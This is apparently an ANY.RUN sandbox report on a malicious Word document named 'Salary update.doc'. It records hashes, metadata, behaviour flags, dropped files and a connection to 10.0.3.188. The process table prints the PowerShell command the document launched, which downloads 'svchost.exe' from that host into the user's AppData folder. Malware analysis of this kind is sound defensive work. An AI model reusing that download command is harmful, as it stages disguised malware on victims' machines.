analyze malware
- Huge database of samples and IOCs
- Custom VM setup
- Unlimited submissions
- Interactive approach
| File name: | Salary update.doc |
| Full analysis: | https://app.any.run/tasks/e1fd5c82-6d2c-482b-a531-9df73c68a445 |
| Verdict: | Malicious activity |
| Analysis date: | June 27, 2022, 09:08:18 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/msword |
| File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Template: Normal, Last Saved By: Roee Besser, Revision Number: 14, Name of Creating Application: Microsoft Office Word, Total Editing Time: 03:50:00, Create Time/Date: Mon Feb 7 16:21:00 2022, Last Saved Time/Date: Thu Feb 10 14:14:00 2022, Number of Pages: 1, Number of Words: 57, Number of Characters: 328, Security: 0 |
| MD5: | 576A61CAE987DA620F99E8608D4E75C6 |
| SHA1: | 58FB2AA87F333D03AB97001A9B491348320BA7E1 |
| SHA256: | 5EDE6E217149052726506C7FB001C02CBF673D6F5FFF0463F407D530BC3B0F48 |
| SSDEEP: | 1536:OzSzi5JcMgmjuTkAK87gxrt+iLmSxgDw3a:OzeFMbqgAKtPm |
MALICIOUS
Unusual execution from Microsoft Office
- WINWORD.EXE (PID: 1620)
Executes PowerShell scripts
- WINWORD.EXE (PID: 1620)
SUSPICIOUS
Reads the computer name
- powershell.exe (PID: 3380)
Checks supported languages
- powershell.exe (PID: 3380)
Creates executable files which already exist in Windows
- powershell.exe (PID: 3380)
Creates files in the user directory
- powershell.exe (PID: 3380)
Reads Environment values
- powershell.exe (PID: 3380)
INFO
Checks supported languages
- WINWORD.EXE (PID: 1620)
Reads the computer name
- WINWORD.EXE (PID: 1620)
Creates files in the user directory
- WINWORD.EXE (PID: 1620)
Checks Windows Trust Settings
- powershell.exe (PID: 3380)
Reads Microsoft Office registry keys
- WINWORD.EXE (PID: 1620)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
TRiD
| .doc | | | Microsoft Word document (54.2) |
|---|---|---|
| .doc | | | Microsoft Word document (old ver.) (32.2) |
EXIF
FlashPix
| CompObjUserType: | Microsoft Word 97-2003 Document |
|---|---|
| CompObjUserTypeLen: | 32 |
| HeadingPairs: |
|
| TitleOfParts: | |
| HyperlinksChanged: | No |
| SharedDoc: | No |
| LinksUpToDate: | No |
| ScaleCrop: | No |
| AppVersion: | 16 |
| CharCountWithSpaces: | 384 |
| Paragraphs: | 1 |
| Lines: | 2 |
| Company: | - |
| CodePage: | Unicode (UTF-8) |
| Security: | None |
| Characters: | 328 |
| Words: | 57 |
| Pages: | 1 |
| ModifyDate: | 2022:02:10 14:14:00 |
| CreateDate: | 2022:02:07 16:21:00 |
| TotalEditTime: | 3.8 hours |
| Software: | Microsoft Office Word |
| RevisionNumber: | 14 |
| LastModifiedBy: | Roee Besser |
| Template: | Normal |
| Comments: | - |
| Keywords: | - |
| Author: | - |
| Subject: | - |
| Title: | - |
Total processes
36
Monitored processes
2
Malicious processes
2
Suspicious processes
0
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process |
|---|---|---|---|---|
| 1620 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Salary update.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | Explorer.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
| 3380 | powershell (New-Object System.Net.WebClient).DownloadFile('http://10.0.3.188/svchost.exe', $env:appdata + '\svchost.exe') | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WINWORD.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) | ||||
Total events
4 150
Read events
3 547
Write events
0
Delete events
0
Modification events
Executable files
0
Suspicious files
3
Text files
1
Unknown types
3
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 1620 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR8F61.tmp.cvr | — | |
MD5:— | SHA256:— | |||
| 1620 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$lary update.doc | pgc | |
MD5:212A59D72ADD80B3765920E7AE94C8BE | SHA256:59ACD2F0828040EED18A8B52C0F24E08292DD58CB1AED2E28DB382B2BAF1897D | |||
| 1620 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:F48D79CDA60D9955C533C348EA4A54C3 | SHA256:DE2D7EC67371761F319E9C78122C3039549E0B706CF0763719DA1FC1C0C03842 | |||
| 3380 | powershell.exe | C:\Users\admin\AppData\Local\Temp\eyh32fnh.mv5.ps1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B | |||
| 3380 | powershell.exe | C:\Users\admin\AppData\Local\Temp\ivj3na3a.23u.psm1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B | |||
| 1620 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex | text | |
MD5:F3B25701FE362EC84616A93A45CE9998 | SHA256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209 | |||
| 3380 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | binary | |
MD5:1068BF0B9B98C206F587A7DB05F6DD06 | SHA256:534478EDAFC5087DAA3749624454988B1F7DF923BF1A0A9E28C5F97C3308CFDB | |||
| 3380 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | dbf | |
MD5:446DD1CF97EABA21CF14D03AEBC79F27 | SHA256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
1
DNS requests
0
Threats
0
HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
3380 | powershell.exe | 10.0.3.188:80 | — | — | — | unknown |